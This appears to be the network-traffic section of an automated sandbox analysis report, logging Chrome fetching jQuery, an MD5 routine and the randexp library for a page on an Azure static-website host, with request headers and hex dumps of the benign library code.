                                2025-04-28 04:34:29 UTC1369INData Raw: 37 32 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38
                                Data Ascii: 7296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8
                                2025-04-28 04:34:29 UTC1369INData Raw: 2c 79 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53
                                Data Ascii: ,y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549706151.101.2.1374436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-04-28 04:34:29 UTC690OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                Host: code.jquery.com
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                sec-ch-ua-mobile: ?0
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Sec-Fetch-Storage-Access: active
                                Referer: https://8734873478934795494.z9.web.core.windows.net/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-04-28 04:34:30 UTC611INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 89501
                                Server: nginx
                                Content-Type: application/javascript; charset=utf-8
                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                ETag: "28feccc0-15d9d"
                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                Access-Control-Allow-Origin: *
                                Cross-Origin-Resource-Policy: cross-origin
                                Via: 1.1 varnish, 1.1 varnish
                                Accept-Ranges: bytes
                                Age: 2215481
                                Date: Mon, 28 Apr 2025 04:34:30 GMT
                                X-Served-By: cache-lga21931-LGA, cache-lax-kwhp1940067-LAX
                                X-Cache: HIT, HIT
                                X-Cache-Hits: 77, 0
                                X-Timer: S1745814870.172427,VS0,VE1
                                Vary: Accept-Encoding
                                2025-04-28 04:34:30 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                2025-04-28 04:34:30 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                2025-04-28 04:34:30 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                2025-04-28 04:34:30 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                2025-04-28 04:34:30 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                2025-04-28 04:34:30 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                2025-04-28 04:34:30 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                2025-04-28 04:34:30 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                2025-04-28 04:34:30 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                2025-04-28 04:34:30 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.549707140.82.114.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-04-28 04:34:30 UTC721OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                Host: github.com
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                sec-ch-ua-mobile: ?0
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Sec-Fetch-Storage-Access: active
                                Referer: https://8734873478934795494.z9.web.core.windows.net/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-04-28 04:34:30 UTC957INHTTP/1.1 302 Found
                                Date: Mon, 28 Apr 2025 04:33:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 0
                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
                                Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250428T043316Z&X-Amz-Expires=300&X-Amz-Signature=8fe791c6996e8d5e875950a19d9b3faaa40e1be3463695fd29b4215c33745969&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                X-Frame-Options: deny
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 0
                                Referrer-Policy: no-referrer-when-downgrade
                                2025-04-28 04:34:30 UTC3511INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.549708185.199.111.1334436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-04-28 04:34:30 UTC1156OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250428T043316Z&X-Amz-Expires=300&X-Amz-Signature=8fe791c6996e8d5e875950a19d9b3faaa40e1be3463695fd29b4215c33745969&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                Host: objects.githubusercontent.com
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                sec-ch-ua-mobile: ?0
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Sec-Fetch-Storage-Access: active
                                Referer: https://8734873478934795494.z9.web.core.windows.net/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-04-28 04:34:31 UTC848INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 10245
                                Content-Type: application/octet-stream
                                Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                ETag: "0x8D9B9A009499A1E"
                                Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                x-ms-request-id: d91f6eaf-e01e-0032-2f18-13e122000000
                                x-ms-version: 2023-11-03
                                x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                x-ms-lease-status: unlocked
                                x-ms-lease-state: available
                                x-ms-blob-type: BlockBlob
                                Content-Disposition: attachment; filename=randexp.min.js
                                x-ms-server-encrypted: true
                                Via: 1.1 varnish, 1.1 varnish
                                Fastly-Restarts: 1
                                Accept-Ranges: bytes
                                Age: 2654
                                Date: Mon, 28 Apr 2025 04:34:31 GMT
                                X-Served-By: cache-iad-kiad7000045-IAD, cache-lax-kwhp1940021-LAX
                                X-Cache: HIT, HIT
                                X-Cache-Hits: 5134, 0
                                X-Timer: S1745814871.100860,VS0,VE1
                                2025-04-28 04:34:31 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                2025-04-28 04:34:31 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
